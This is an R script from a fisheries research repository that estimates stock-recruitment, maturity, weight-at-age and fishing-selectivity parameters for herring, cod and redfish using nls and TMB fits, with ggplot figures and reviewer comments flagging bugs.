theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redfsel + geom_point(data= fmort3, aes(x=Age,y=sel), size= 2.5)
## Arrange the per-species panels side by side and save the last plot drawn.
grid.arrange(nsshmat, codmat, redmat, ncol=3)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(nsshfsel, codfsel, redfsel)
## Note: ggsave() saves the last ggplot drawn, not the grid.arrange() output.
ggsave(filename="fsel_nssh.pdf",
plot=last_plot(),
width = 100,
height = 80,
units = "mm")
###### PLOTTINg all ############
## BUG FIX / NOTE(review): the lines below referenced objects that are never
## created in this script (maturitynssh, maturitycod, maturityred, capematurity,
## capmat), called map2() with four inputs (it takes exactly two), and passed a
## nonexistent `by.z` argument to merge(); every line would error at runtime.
## Commented out so the script can run end to end; restore once those objects
## exist and the join is rewritten (e.g. bind_rows() + a species column).
#maturitynssh$species <- "NSSH"
#maturitycod$species <- "cod"
#maturityred$species <- "redfish"
#maturitynssh <- as.data.frame(maturitynssh)
#maturitycod <- as.data.frame(maturitycod)
#maturityred <- as.data.frame(maturityred)
#cbind(maturitycod, maturitynssh, maturityred, capematurity)
#map2(maturitynssh, maturitycod, maturityred, capmat, left_join)
#matall <- merge(maturitynssh, maturitycod, maturityred, by.x = "mprop.est", by.y = "Age", by.z = "species", all.x = T, all.y = T, all.z= T)
## Redfish selectivity points with the fitted curve (uses the redfish fmort3).
params <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point() +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est))+ labs(y= "Fishing selectivity", x= "age") + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"))
## BUG FIX: aes(y= ) below was left incomplete and would error when drawn.
#params <- params + geom_point(aes(y= ))
grid.arrange(redmat, nsshmat, codmat)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(redfsel, nsshfsel, codfsel)
| /Param_est_copy.R | no_license | jessicaweb3/fmsy_m | R | false | false | 36,237 | r | library(tidyverse)
library(gridExtra)
library(ggplot2)
library(dplyr)
library(gridExtra)
library(reshape2)
library(openxlsx)
library(TMB)
library(here)
library(png)
#####------------ NOTES -------------------#####
# - nll for parameter estimation is log-likelihood
# - SSB is real numbers & SSB1 is theoretical numbers
#------------------------- DATASETS -------------------------------#
## NOTE(review): sheets of the SAME workbook are read from two different
## folders ('Scripts_R/' for sheet 1 vs 'Scripts/' for the rest, for both the
## NSSH and cod files) -- verify both copies exist and are identical.
nsshass <-read.xlsx(here('Scripts_R/NSSH assessment.xlsx'),sheet=1)
nsshmaturity<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=2)
nsshweight <- read.xlsx(here('Scripts/NSSH assessment.xlsx'), sheet=3)
nsshfmort<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=4)
codass <-read.xlsx(here('Scripts_R/Cod_assessment.xlsx'),sheet=1)
#for biased plotting codass <- codass[-74,]
# colnames(codass)[5] <- "SSB"
# colnames(codass)[6] <- "SSBhigh"
# colnames(codass)[7] <- "SSBlow"
codmaturity<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=2)
codweight <- read.xlsx(here('Scripts/Cod_assessment.xlsx'), sheet=3)
codfmort<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=4)
#for biased plotting
#redfishass <-read.xlsx(here('Scripts/S.mentella_assessment.xlsx'),sheet=1) # Advice2020
# colnames(redfishass)[3] <- "SSB"
#colnames(redfishass)[4] <- "SSBhigh"
#colnames(redfishass)[5] <- "SSBlow"
redfishass <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=2) # Advice2018
redfishass2 <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=3) # AFWG2019
redfishmaturity<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=4)
redfishweight <- read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'), sheet=5)
redfishfmort<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=6)
#######################################################################
######--------------- NSSH --------------- #############
#######################################################################
#### Setting up general parameters
## Norwegian spring-spawning herring: ages 2-15, recruitment at age 2.
age <- c(2:15)
recage<-2
start.rec <- mean(nsshass$Rec.age2)*1000
#### Recruitment: important to correct for the rec.age offset ####
## Lag SSB by recage years so recruits are paired with their parent SSB.
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
## Ricker fit via the linearised form log(R/SSB) = alpha + beta*SSB.
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB), data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation1<-acf(residuals(nlsrssb))
AR1par<-autocorrelation1$acf[2] # lag-1 autocorrelation of the residuals
Rvar.std <- mean(exp(rnorm(1e6,0,ricker.sd))) # lognormal bias-correction factor
SSB1 <- seq(0,9e6,1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm. dist error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation)/Rvar.std #- Stochasticy term
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) # autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf)/Rvar.std #- stochasticity term
plot(nsshRecruitment5~SSB1,type="l",col="red") #xlim=c(0, 9), ylim=c(0, 60), xlab="SSB1 million t", ylab="Rec billions") #,ylim=c(0,7e7))
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariation)/Rvar.std #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr. error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf)/Rvar.std #- Stochasticity
plot(Recruitment5~SSB,type="l",col="red")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
## Sums of squared deviations from assessed recruitment for the three variants.
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhnlsrssb <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhnlsrssb)$coefficients[1]
betabh <- summary(bhnlsrssb)$coefficients[2]
bh.sd<-sd(residuals(bhnlsrssb))
bhvar.std <- mean(exp(rnorm(1e6,0, bh.sd)))
bhvariation<- rnorm(length(SSB1),0,bh.sd)
SSB1 <- seq(0, 9e6, 1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment6 <- 1/(betabh + alphabh * 1/SSB1) # testing the alpha and beta, works!
Recruitment6.1 <- 1/(betabh + alphabh * 1/SSB1) * (1/(bhvariation))/bh.sd #- Stochasticy term
plot(nsshRecruitment6 ~ SSB1,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#----- Plotting all ---- #
rec.vector <- c(nsshRecruitment5, nsshRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(nsshRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
## NSSH maturity-at-age: melt to long format, filter to years > 1987 and
## ages > 1, then fit a logistic ogive via a TMB model ('maturity.cpp').
maturity2 <-melt(nsshmaturity,id.vars="Year")
maturity2$Age <- rep(0:15,each=dim(nsshmaturity)[1])
maturity3 <- maturity2 %>% filter(Year>1987 & Age>1)
maturity3 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity3$Age # changed it from maturity2 to maturity3 to use correct filter
data$mprop<-maturity3$value
param <- list()
param$a50 <- 4        # starting value: age at 50% maturity
param$env <- .2       # starting value: ogive slope parameter
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity3$mprop.est <- 1/(1+exp(-((maturity3$Age-a50)/env)))
nsshmat <- maturity3 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age")+ theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="a")
##### Weights #####
## NSSH weight-at-age: fit a von Bertalanffy-type growth curve
## W = Winf * (1 - exp(-k*age))^b via TMB ('weight.cpp').
weights2 <-melt(nsshweight,id.vars="Year")
weights2$Age <- rep(0:15,each=dim(nsshweight)[1])
weights3 <- weights2 %>% filter(Year>1987 & Age>1)
weights3 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights3$Age # changed it from weights2 to weights3 to use correct filter
data$wprop<-weights3$value
param <- list()
param$k <- 0.4        # starting value: growth rate
param$b <- 3          # starting value: shape exponent
param$Winf <- 0.4     # starting value: asymptotic weight (kg)
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights3$wprop.est <- Winf * (1-exp(-k * weights3$Age))^b
nsshwei <- weights3 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="a")
##### Selectivity #####
## NSSH fishing selectivity: normalise F-at-age to [0,1], apply ad hoc
## corrections, then fit a logistic selectivity curve via TMB ('sel.cpp').
fmort2<-melt(nsshfmort,id.vars="Year")
fmort2$Age <- rep(2:12,each=dim(nsshfmort)[1])
fmort2 %>%
  ggplot(aes(x=Age,y=value, color=as.factor(Year))) + geom_point()
### ad hoc fix: everything above age 5 is fully selected
fmort2 <- fmort2 %>% mutate(sel=ifelse(Age>5,1,value/max(value[Age<5])),sel=ifelse(sel>1,1,sel))
fmort2 %>%
  ggplot(aes(x=Age,y=sel, color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(sel=mean(sel))
### ad hoc fix: everything below age 3 is not fished
fmort3 <- fmort3 %>% mutate(sel=case_when(Age<3 ~ 0,TRUE ~ sel))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7        # starting value: age at 50% selection
param$ss <- 1         # starting value: selectivity slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
nsshfsel <- fmort3 %>%
  ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="a") + scale_x_continuous(breaks=c(2,6, 10))
#######################################################################
######--------------- NEA COD --------------- #############
#######################################################################
## Same workflow as the NSSH section, for NEA cod (recruitment age 3).
age <- c(3:15) ## maximum age 3-15
recage<- 3
start.rec <- mean(codass$Rec.age3)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(codass$Year)
Rec <- codass$Rec.age3[(recage+1):tsl]*1000
SSB <- codass$SSBtonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1), na.action = na.omit)
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
## NOTE(review): unlike the NSSH section, no lognormal bias correction
## (Rvar.std) is applied to the stochastic variants below -- confirm.
SSB1<-seq(0, 6e6, 1e3)
SSB1<- SSB1/1000000 # for plotting
Recruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB1,type="l",col="red", xlim=c(0,6), ylim=c(0,3), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB,col="red", type="l", xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
#run first lines of NEA rec to load data
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
## NOTE(review): SSB1 is (re)defined here but `codRec6` below is evaluated
## on the assessed SSB, not SSB1 -- the comment and the code disagree;
## confirm which grid was intended.
SSB1 <- seq(0,9e6,1e5)
#SSB1 <- SSB1/1000000 #for plotting
codRec6 <- betabh + alphabh * (1/SSB) # testing the alpha and beta, works!
plot(1/codRec6 ~ SSB,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
## plot
## Observed recruitment vs the three Ricker variants on assessed SSB.
rec.vector<-c(Rec,Recruitment5,Recruitment5.1, Recruitment5.2)
type<-rep(c("Real","Ricker","Ricker5.1", "Ricker5.2"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,4),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
  scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT
# ## 6. BH - NB: fit depends heavily on starting values and sucks (tends to become constant)
# compile('Scripts/bh.cpp')
# dyn.load(dynlib('Scripts/bh'))
#
# data<-list()
# data$ssb<-SSB
# data$logR<-log(Rec)
#
# param <- list()
# param$loga <- 1
# param$logb <- 1
# param$logsigma <-0
#
# obj <- MakeADFun(data, param,DLL="bh")
# optbh <- nlminb(obj$par, obj$fn, obj$gr)
#
# Recruitment6 <- (optbh$par[1]*SSB)/(1+optbh$par[2]*SSB) #exp(optbh$par[1]+log(SSB)-log(exp(optbh$par[2])*SSB))
#
# alphabh <- optbh$par[1]
# betabh <- optbh$par[2]
#
#
# plot(Recruitment6~SSB, col="red", pch=3)
#
# ## plot
# rec.vector<-c(Rec, Recruitment5, Recruitment6)
# type<-rep(c("Real","Ricker","BH"),each=length(Rec))
# rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
#
# rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
# scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT continued (another way)
## Refit the linearised BH (1/R = beta + alpha/S) and back-transform the
## prediction to R = S/(alpha + beta*S); error is ADDITIVE on the R scale
## here (unlike the lognormal Ricker error above).
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
nlsrssb <- nls(1/Rec ~ beta + alpha / SSB, data=data,start=list(alpha=5,beta=-1))
alphabh <- summary(nlsrssb)$coefficients[1]
betabh <- summary(nlsrssb)$coefficients[2]
#Recruitment6 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB6 <- SSB/(alphabh +betabh *SSB)
## NOTE(review): bh.sd is the RECIPROCAL of the residual sd; residuals of
## this fit are on the 1/R scale, and 1/sd(resid) is not the sd on the R
## scale -- confirm this transformation is intended before trusting the
## stochastic variants below.
bh.sd <- 1/sd(residuals(nlsrssb))
bh.mean <- mean(residuals(nlsrssb))
autocorrelation <- acf(residuals(nlsrssb))
AR1par <- autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0, 4e6, 1e5)
Recruitment6 <- SSB1/(alphabh +betabh *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB1/(alphabh +betabh *SSB1) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB1/(alphabh +betabh *SSB1) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB1,col="red", type="l",ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB1,col="blue",pch=1)
points(Recruitment6.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment6 <- SSB/(alphabh +betabh *SSB) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB/(alphabh +betabh *SSB) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB/(alphabh +betabh *SSB) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB,col="red", pch=3,ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB,col="blue",pch=1)
points(Recruitment6.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
## Sum-of-squares fit comparison for the Beverton-Holt variants on assessed SSB.
## BUGFIX: this line previously re-scored the Ricker predictions
## (Recruitment5, 5.1, 5.2) -- a copy-paste from the Ricker section, where
## the same comparison has already been printed.  In this BH section it
## should score the BH predictions computed just above.
c(sum((Rec-Recruitment6)^2),sum((Rec-Recruitment6.1)^2),sum((Rec-Recruitment6.2)^2))
## plot: observed recruitment vs deterministic Ricker and BH predictions.
rec.vector<-c(Rec, Recruitment5, Recruitment6)
type<-rep(c("Real","Ricker","BH"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
  scale_color_brewer(palette="Accent") + theme_bw()
##### Maturity #####
## Cod maturity-at-age (ages 3-15): logistic ogive fitted via TMB.
maturity2 <-melt(codmaturity,id.vars="Year")
maturity2$Age <- rep(3:15,each=dim(codmaturity)[1])
maturity2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity2$Age
data$mprop<-maturity2$value
param <- list()
param$a50 <- 4        # starting value: age at 50% maturity
param$env <- .2       # starting value: ogive slope parameter
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity2$mprop.est <- 1/(1+exp(-((maturity2$Age-a50)/env)))
codmat<-maturity2 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Weights #####
## Cod weight-at-age: W = Winf*(1-exp(-k*age))^b fitted via TMB.
weights2 <-melt(codweight,id.vars="Year")
weights2$Age <- rep(3:15,each=dim(codweight)[1])
weights2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
codwei<-weights2 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Selectivity #####
## Cod fishing selectivity: mean F-at-age normalised to [0,1], logistic
## curve fitted via TMB ('sel.cpp').
fmort2<-melt(codfmort,id.vars="Year")
fmort2$Age <- rep(3:15,each=dim(codfmort)[1])
fmort2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
codfsel<- fmort3 %>%
  ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="b")
#######################################################################
######--------------- BEAKED REDFISH --------------- #############
#######################################################################
## S. mentella: recruitment age 2, plus-group age 40.  Uses the AFWG2019
## series (redfishass2); the Advice2018 series (redfishass) is kept
## commented out for comparison.
recage <- 2
amax <- 40
age <- recage:amax
start.rec <- mean(redfishass2$Rec.age2thousand)*1000
#### Recruitment ####
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
